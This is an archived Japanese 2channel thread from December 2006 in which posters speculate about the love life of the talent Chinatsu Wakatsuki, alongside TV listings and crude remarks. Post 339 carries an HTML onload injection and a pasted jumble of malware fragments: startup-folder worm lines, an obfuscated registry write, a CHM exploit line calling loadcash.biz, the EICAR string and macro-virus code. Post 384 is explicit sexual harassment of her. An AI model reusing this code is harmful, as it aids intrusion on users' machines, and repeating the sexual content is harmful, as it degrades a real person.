298 :通行人さん@無名タレント:2006/12/25(月) 02:12:06 ID:/pRAht/w
渡辺アナって噂もあるよ!
剛ではないだろ!

299 :通行人さん@無名タレント:2006/12/25(月) 02:12:57 ID:LiTmrUmF
情報が錯綜してるから,とりあえずまだ信用しない方がいいよ

300 :通行人さん@無名タレント:2006/12/25(月) 02:15:18 ID:DM4Cmnqy
堂本剛と若槻千夏は「正直しんどい」

301 :通行人さん@無名タレント:2006/12/25(月) 02:18:38 ID:kbU4yEHV
剛はありえないだろ
片思いの話をテレビでされるだけで泣くような子が
その対象としょっちゅう平気な顔して共演できる訳ないじゃん
1月3日のしんどいSP(生)でまた共演するのに

302 :通行人さん@無名タレント:2006/12/25(月) 02:21:26 ID:c+AifNqP
でも海外に住んでる八木が知ってる人なんて限られてるし。

303 :通行人さん@無名タレント:2006/12/25(月) 02:24:14 ID:CR9NrfZW
もし剛なら若槻もそんな安易にネタの提供なんてできないと思うが。
相手はジャニーズだぞ。
若槻もその変はわきまえてるだろ。

304 :通行人さん@無名タレント:2006/12/25(月) 02:29:00 ID:0rfyGUoI
相手は芸人らしいよ

305 :通行人さん@無名タレント:2006/12/25(月) 02:34:31 ID:474+n4kb
ロバート秋山なんて八木知らないんじゃねえか。

306 :通行人さん@無名タレント:2006/12/25(月) 02:41:20 ID:/pRAht/w
渡辺アナ?

307 :通行人さん@無名タレント:2006/12/25(月) 02:45:28 ID:sKZR7Um6
剛、もこみちなどの芸能人もないだろ
タレントに彼女いるなんて匂わせるようなこと
空気のよめる若槻はしない

普通にうまっちの番組スタッフ

308 :通行人さん@無名タレント:2006/12/25(月) 02:46:38 ID:sKZR7Um6
>>306
過去ログ嫁
ミリオネアで彼女いるってとっくの昔に公言してる
23日に判明するなんてありえない


309 :通行人さん@無名タレント:2006/12/25(月) 02:46:50 ID:6LfUiD45
若槻は自分の恋愛のことになると、気持ちが高まって相手がジャニーズだろうと何だろうと、ズバッと言うと思う。
さんまさんも深夜だし、あんま事務所がどーのこーのなんて考えてないでしょ。

310 :通行人さん@無名タレント:2006/12/25(月) 02:47:28 ID:Rej3UyI/
お疲れ様でした

311 :通行人さん@無名タレント:2006/12/25(月) 02:49:18 ID:CR9NrfZW
>>307
だろうな。うまっちの番組スタッフだ。
23日にうまっちで仕事復帰したんだからその時に知ってしまったんだろう。

312 :通行人さん@無名タレント:2006/12/25(月) 02:51:38 ID:6LfUiD45
>>311
そうなら嬉しい。
剛ファンとして。

313 :通行人さん@無名タレント:2006/12/25(月) 02:53:50 ID:OSllLfcO
プロなら異性交遊で仕事グダグダにするなよな
明石家サンタでも正直イライラした
あれが演技なら媚を売ってるようで腹が立つ
本当だとしてもプロ意識持てと言いたい

314 :通行人さん@無名タレント:2006/12/25(月) 02:55:54 ID:LiTmrUmF
番組で誰でも知ってる芸能人ですって言ってたよ。付け足して八木さんも知ってる人ですと言ってた。
芸能人…番組スタッフは芸能人じゃないんじゃ?

315 :通行人さん@無名タレント:2006/12/25(月) 02:57:03 ID:sKZR7Um6
芸能人なんて一言も言ってない

316 :通行人さん@無名タレント:2006/12/25(月) 02:57:39 ID:p1FWDG77
ちー頑張ってね。俺がもう少し売れるようになったら必ず幸せにするから。それまで待っててね!辛い思いさせてゴメンね。

ちゃんと結婚も考えてるから。

後3年待ってて。

317 :通行人さん@無名タレント:2006/12/25(月) 02:58:21 ID:1nlrKdCG
うわー・・ ひくわー

318 :通行人さん@無名タレント:2006/12/25(月) 03:00:27 ID:LiTmrUmF
芸能人て言ってなかったっけ?聞き間違いだったのか…スマソ

319 :通行人さん@無名タレント:2006/12/25(月) 03:04:54 ID:ZL3o1bUQ
さんまがあの彼は無理じゃないかなって思ったんだろ。ってことはその彼はかなり
モテて競争相手が多いってことだ。

単なる番組スタッフなら若槻はグラビアアイドルだし、ルックスも性格も問題ない
んだしさんまが見て無理だっていう判断にはならないはず。

しかも、海外に住んでる八木でさえ名前を知ってる。

3つを総合すると相手は相当モテてレベルの高い男性→堂本剛だな。

320 :通行人さん@無名タレント:2006/12/25(月) 03:06:01 ID:p1FWDG77
ちー俺も好きだよー!!

321 :通行人さん@無名タレント:2006/12/25(月) 03:06:12 ID:rgVAkdKl
雰囲気からして芸能人っぽかったけど、
八木アナもよく知ってる人って言ってたからフジの人っぽいよね。
そうすると、アナウンサーって考えるのが普通じゃないかな。
そして、別にどっかの番組で彼女いると言ってても
若槻千夏本人の耳に入らなくてもおかしくない。むしろ、
その男に彼女がいるのが人づてなりで分かるってことはどっかで
それが公表されてる可能性が高い、そうすると?

322 :あいぽっぱー:2006/12/25(月) 03:14:02 ID:5M4DTmFJ
とりあえずそっとしておこう。
気になるけど噂をたてると彼女を傷つけて
しまうからね。若いのに偉いよ皆。

323 :通行人さん@無名タレント:2006/12/25(月) 03:20:47 ID:GPtKighy
芸能人なら堂本かウエンツだと思う

324 :通行人さん@無名タレント:2006/12/25(月) 03:25:15 ID:cqFPcfad
まあけどさんまが言ってた通りこの年で別れたって大したこと無いだろ
東の方が悲惨だろ

325 :通行人さん@無名タレント:2006/12/25(月) 03:25:39 ID:o6ge4tq2
陣内に彼女がいたぐらいで休業するなよwwww

326 :通行人さん@無名タレント:2006/12/25(月) 03:29:14 ID:NVlPojnH
うまっちのスタッフはないでしょ。うまっちのスタッフレベルで若槻みたいな
タレント側に誘われたら90%以上が喜んで付き合うでしょ。

さんまが無理じゃないかなって思ったり、まだ押したらいけるって慰めからいて
相手の男のレベルが相当高いと見て間違いなさそうだ。

327 :通行人さん@無名タレント:2006/12/25(月) 03:37:59 ID:sKZR7Um6
なんか必死に堂本剛にしようとしてるやつがいるなw
あほなんだろうけど

328 :通行人さん@無名タレント:2006/12/25(月) 03:40:13 ID:rgVAkdKl
何気にジョッキーとか?

329 :通行人さん@無名タレント:2006/12/25(月) 03:46:11 ID:D/mteXN4
>>327
いや、堂本剛の可能性が現地点では一番高いだろ。

330 :通行人さん@無名タレント:2006/12/25(月) 04:20:23 ID:ebCTupI5
片思いの相手は、ほぼ堂本剛だろ

331 :通行人さん@無名タレント:2006/12/25(月) 04:32:38 ID:8sZxbz3u
117 名前: ななしじゃにー [sage] 投稿日: 2006/12/20(水) 18:27:38 ID:iWHXs/0k
お似合いお似合い 
  
66:ななしじゃにー :2006/12/18(月) 17:08:25 ID:Fz+SIsAY 
堂兄で、剛がすき焼き好きと言った週に高垣麗子がすき焼きが好きだとブログで言ったり 
高垣麗子が、家族は大事発言をしている矢先に麗子が出てるファッション雑誌で堂本剛が「家族を大事にしている女性はいい」みたいな発言をしたり 


剛と高垣麗子はまじでお似合いな二人 




332 :通行人さん@無名タレント:2006/12/25(月) 04:35:42 ID:qJ4nDsgu
若槻の底抜けに明るい所が好きなんだよなあ。戻ってきてくれて素直に嬉しいよ

333 :通行人さん@無名タレント:2006/12/25(月) 04:41:48 ID:VP56K7PQ
>>329
堂本剛はあり得ない
ジャニーズ相手に生放送で「相手に付き合ってる人がいることがわかりました」なんて言ったら大問題になる
若槻がそんな凡ミスするとは思えないし、さんまの反応も普通だったし。

334 :通行人さん@無名タレント:2006/12/25(月) 04:53:45 ID:xqE5ZIDe
堂本剛は違うでしょ、若槻が『23日に付き合ってる人がいる事わかった』って
言った時さんまは知ってる感じだったよね驚いてなかったし。
片思いの相手は芸人以外でさんまもわりと親しい人なんじゃない?
‘23日’ってなんかキーポイントな気がする


335 :通行人さん@無名タレント:2006/12/25(月) 04:58:36 ID:8sZxbz3u
まぁ亀梨がキョンキョンと同棲してたっつーのは
22日深夜にネットで。23日には見れる罠。
でも、やっぱ福永っぽい感じがするんだよなぁ〜

336 :通行人さん@無名タレント:2006/12/25(月) 05:42:01 ID:p5OjFEVv
ttp://hokuro7sei.blog13.fc2.com/?mode=m&no=1090

337 :通行人さん@無名タレント:2006/12/25(月) 06:02:27 ID:tqUyEZGh
ナイナイの岡村は?

338 :通行人さん@無名タレント:2006/12/25(月) 06:22:35 ID:FMO/Jvwk
わざわざ熊田の元カレなんてまた好きになるかな?っていうか岡村ならさんまは
逆に引っ付けに行くだろう。どっちも身内に近いんだし。

339 :<body onload=window()>:2006/12/25(月) 07:29:25 ID:JRQ1rC+0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


340 :通行人さん@無名タレント:2006/12/25(月) 09:05:24 ID:rKx7mwJH
彼女がいることをバラしても問題ない相手って時点で芸能人は考えられないだろ
アイドルだろうと芸人だろうと相手に迷惑がかかることになるんだから

341 :通行人さん@無名タレント:2006/12/25(月) 09:17:28 ID:c4vaKLC+
動画ないんですか?

342 :通行人さん@無名タレント:2006/12/25(月) 09:35:59 ID:JbYuZD+8
ジョッキーだよ

343 :通行人さん@無名タレント:2006/12/25(月) 10:37:52 ID:4I8fp7kI
武だったら笑えるよね

344 :通行人さん@無名タレント:2006/12/25(月) 12:45:24 ID:0BQpirtq
さんまに相談するくらいだからさんまと親しい人間だろ

345 :通行人さん@無名タレント:2006/12/25(月) 13:46:54 ID:WWFCmhva
福永

346 :通行人さん@無名タレント:2006/12/25(月) 15:25:04 ID:uaf0+/FG
さんまはJRAのCMやってたし、関西で競馬番組やってるから
ジョッキー連中とは親しいよな。

347 :通行人さん@無名タレント:2006/12/25(月) 16:26:07 ID:qlMkf2PS
有馬記念でラストランを圧勝したディープインパクトに、芸能界からも大感激&祝福の嵐だ。
2年前、競馬キャスターに就任して以来、ディープとともに歩んできたタレント、若槻千夏(22)も有馬記念でキャスターを卒業。
「今までで一番安心して見ていられました。感動をありがとう」と涙、涙…。
「今度は牧場に会いに行きたい」と熱望していた。

レース後、祝福するため武豊騎手のもとへ駆け寄った際、
武から「ディープと一緒に引退なんて、ディープと種付けするんですか?」と言われて、照れ笑いしていた。

http://www.sanspo.com/geino/top/gt200612/gt2006122503.html

ディープと種付けするんですか?

348 :通行人さん@無名タレント:2006/12/25(月) 19:11:28 ID:lEznBdNp
フジのアナウンサーだと思う

349 :通行人さん@無名タレント:2006/12/25(月) 20:33:02 ID:XlSuuPwm
どうでもいんだけど。
誰か気になるって言えば気になるね。
でもやっぱさんまはちょっとしゃべりすぎだよね。
かわいそうだよ。
紳助がわについたほうがいいかも。紳助は解決するまでOKが出るまで
話さないから。

350 :通行人さん@無名タレント:2006/12/25(月) 21:32:51 ID:8sZxbz3u
そのくせ、自分のことバラされるとマジ切れだもんな、秋刀魚。


351 :通行人さん@無名タレント:2006/12/25(月) 23:05:23 ID:U4l4D4C5
あれってマジギレなのか?思い切り笑いにしてると思うけど。暴露本で
「SEXの内容がいたって普通とまで」書かれてるのに。

352 :通行人さん@無名タレント:2006/12/26(火) 02:05:13 ID:10tU5tBS
休養する前の2週ぐらいの明石家電視台を見ると結構疲れを感じた。肉体的な
疲れも有るんだろうけど、明石家電視台みたいにボケを必死で考えなきゃダメな
番組をずっとやってるのがアイドルであって芸人ではない若槻には相当辛いんだと
思う。そろそろ番組降板しても良いと思う。

353 :通行人さん@無名タレント:2006/12/26(火) 14:27:11 ID:YClH5csA
>>333
堂本か別にして、
名前を出してないからジャニーズでも問題ないでしょう
中国飯店でやったさんまと八木がいた食事会での話だから
>>334
ルックスからいても可笑しくないということでしょう

354 :通行人さん@無名タレント:2006/12/26(火) 14:54:44 ID:R2nYk6KX
>>352
若槻が辞めたら後任は大沢あかねか里田まいか。でも大沢も最近忙しそうだが。

355 :通行人さん@無名タレント:2006/12/26(火) 15:07:29 ID:PVJPuoez
>>352
いやいや 単純に量だと思う。いろいろやってそれぞれ100%だと
身体壊すんで、仕事を選べばいいと思う。
だから結局 事務所が守ってやんなきゃだめなんだよ。

356 :通行人さん@無名タレント:2006/12/26(火) 16:56:16 ID:QK3egllr
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【芸能】若槻千夏、「うまッチ!」最終回で仕事復帰…有馬記念予想は「もちろんディープです」[12/24] [芸スポ速報+]
【芸能】若槻千夏、涙の理由は…「明石家サンタ」でさんまに告白[12/25] [芸スポ速報+]
【芸能】「ケツなら自信あるからいいよ」仕事を干された若槻千夏が尻出しを決意 [痛いニュース+]
゚・*:.。. 若槻千夏 part4 ゚・*:.。. [女性アイドル]
若槻千夏「MacBook+iPod nano要らない」 [新・mac]
武豊「若槻さんディープと種付けするんすか?w」 [ニュース速報]
●▲★世論調査総合スレ32★▲● [議員・選挙]
明石家サンタ 2006 [テレビ番組]


357 :通行人さん@無名タレント:2006/12/26(火) 17:13:38 ID:CPp4Afhj
で、誰

358 :通行人さん@無名タレント:2006/12/26(火) 18:24:55 ID:4KPsOcx8
下痢ピー治って良かったね。あの綺麗な尻から下痢ピッピーは辛かったね。想像したらもう抜けないや。

359 :通行人さん@無名タレント:2006/12/26(火) 18:29:40 ID:3NiASj0d
未だに病気療養のための欠席だったと思ってる奴を見ると和む〜♪

360 :通行人さん@無名タレント:2006/12/26(火) 18:46:21 ID:4KPsOcx8
↑おれもお前みたく無駄知識ばっか貯えられる暇なニート見ると和むよwww

361 ::2006/12/27(水) 00:57:39 ID:LAJkubQL
矢印爆撃はこうやれ、不登校ニート厨房www

362 :通行人さん@無名タレント:2006/12/27(水) 01:53:44 ID:0mnKYIKS
いつでも俺が幸せにしてやるぞ!

363 :通行人さん@無名タレント:2006/12/27(水) 06:08:46 ID:8V5yPCAE
ジャニーズなんてだっさいし興味ないでしょ

364 :通行人さん@無名タレント:2006/12/27(水) 12:14:58 ID:bwoMdl5j
いいとも出てる

365 :通行人さん@無名タレント:2006/12/27(水) 12:32:19 ID:kA8Xb/aB
いいとも出てるが、やばいくらいに貧乳がわかる服だwww

366 :通行人さん@無名タレント:2006/12/27(水) 13:02:20 ID:cjl3RpgX
深田恭子がこれでもかって乳出してたな

367 :通行人さん@無名タレント:2006/12/27(水) 13:03:15 ID:iZDdk2x6
喉どうしたのかな
声帯やられてるの?
でも芸人よりいい仕事してたね。いいともを盛り上げようと頑張ってた!
でも更に痩せて胸無くなっちゃったね。

368 :通行人さん@無名タレント:2006/12/27(水) 13:26:38 ID:uYmL+eTQ
母乳さえ出れば、生活には困らないよ。
男は吸ってれば幸せだし。

369 :通行人さん@無名タレント:2006/12/27(水) 20:46:36 ID:nrPimnfH
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【芸能】若槻千夏、涙の理由は…「明石家サンタ」でさんまに告白[12/25] [芸スポ速報+]
【芸能】「ケツなら自信あるからいいよ」仕事を干された若槻千夏が尻出しを決意 [痛いニュース+]
【競馬】武豊、「一緒に引退なんてディープと種付けですか?」 と若槻千夏におやじギャグ [芸スポ速報+]
【芸能】若槻千夏、「うまッチ!」最終回で仕事復帰…有馬記念予想は「もちろんディープです」[12/24] [芸スポ速報+]
過去ログ [芸スポ速報+]


370 :通行人さん@無名タレント:2006/12/28(木) 01:34:27 ID:rrZge4h2
うるさいからもう出てこないでください

371 :通行人さん@無名タレント:2006/12/28(木) 05:03:55 ID:8iPwv37u
若槻千夏&城咲仁、新人ホストのトミー・リー・ジョーンズと共演…BOSS新CM
http://www.sanspo.com/geino/top/gt200612/gt2006122809.html

372 :通行人さん@無名タレント:2006/12/28(木) 05:35:31 ID:G/KefDCo
>>295
Yahoo!で検索するとわかるが、堂本剛の彼女はモデルの高垣麗子。
まあ八木アナも親しそうな辺りをみると、もこみちや堂本はないと思うが。

373 :通行人さん@無名タレント:2006/12/28(木) 05:50:39 ID:I8o6FPW9
>>281
盲目堂本剛ヲタ乙。堂本剛のモデルの彼女(高垣麗子)をやくな。

検索していると、フジの渡辺が有力らしい…。
芸能ニュースでフジの関係者である事は言われている。


374 :通行人さん@無名タレント:2006/12/28(木) 05:55:57 ID:TO5GdGyR
結局事務所代わったの?

375 :通行人さん@無名タレント:2006/12/28(木) 14:07:00 ID:P3GCvlY7
乳は小さいかもしれん




だがそれがいい

376 :通行人さん@無名タレント:2006/12/28(木) 20:10:58 ID:8BOdC76Q
12/29(金)深夜0:15〜5:30毎日
「オールザッツ漫才2006!」
12/30(土)正午 〜後1:30日テレ
「メレンゲの気持ち」
12/31(日)深夜0:45〜2:15フジ/関テレ系
「最強運芸能人決定戦。2007年はコイツにのれスペシャル」
1/2(火)深夜0:55〜4:00フジ/関テレ系
「女だらけのかうんとだうん新年会」
1/7(日)後3:00〜4:00フジ
「スーパー競馬」
1/8(月)後11:55〜深夜1:25毎日
「明石家電視台名場面集〜笑いの数は日本一!?サンマン監督もシンジラレナーイSP」


377 :通行人さん@無名タレント:2006/12/28(木) 21:25:00 ID:8BOdC76Q
鳥越道場3
12/30 (土) 23:20〜0:45
脱いだらヤバイ?富士山(秘)健康修業!眞鍋かをりVS磯山さやか限界ポーズでダイエット▽中山秀ちゃん大暴走
▽若槻千夏が復活宣言▽西川女医が農業に挑む▽ビビる母の愛に感動

378 :通行人さん@無名タレント:2006/12/28(木) 22:59:10 ID:phYTtq7y
昨夜のマンピコ良かった。秀ちゃんが眞鍋に連発してた。千夏が横にいれば文句なし。
明日のマンピコが楽しみ♪

379 :通行人さん@無名タレント:2006/12/28(木) 23:35:21 ID:pNoXsVfG
悪質だな(^^ゞ 
http://e.pic.to/4xljs

380 :通行人さん@無名タレント:2006/12/29(金) 00:25:07 ID:W+c+eVpX
若槻レベルで芸能界をなめたらいかん

381 :通行人さん@無名タレント:2006/12/29(金) 09:41:41 ID:a2VsZkIs
あの甲高いキンキン声変わってないな

382 :通行人さん@無名タレント:2006/12/29(金) 12:31:33 ID:S3Wz74jA
オールザッツ漫才2006!
漏らさんように 便器座って遣れ夜!


383 :通行人さん@無名タレント:2006/12/29(金) 12:32:43 ID:S3Wz74jA
オールザッツ漫才2006!
漏らさんように 便器座って遣れ夜!


384 :さds:2006/12/29(金) 13:08:09 ID:z/f2vdCw
千夏のマンコにいれて中だししてー。アナルもベロベロ舐めまわしてやりたい。千夏と交尾したい。俺の子供を作ってくれ。

385 :通行人さん@無名タレント:2006/12/29(金) 17:13:54 ID:zYFzTH0k
オールザッツ漫才2006! 千夏オムツ四手こいよ


386 :通行人さん@無名タレント:2006/12/29(金) 18:46:08 ID:oqkKi4aD
オールザッツ漫才が終わるまで入院しててほしかった

387 :通行人さん@無名タレント:2006/12/30(土) 02:23:43 ID:T9o6sJZD
陣内司会へた何年やってんだ

のりか風

77 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)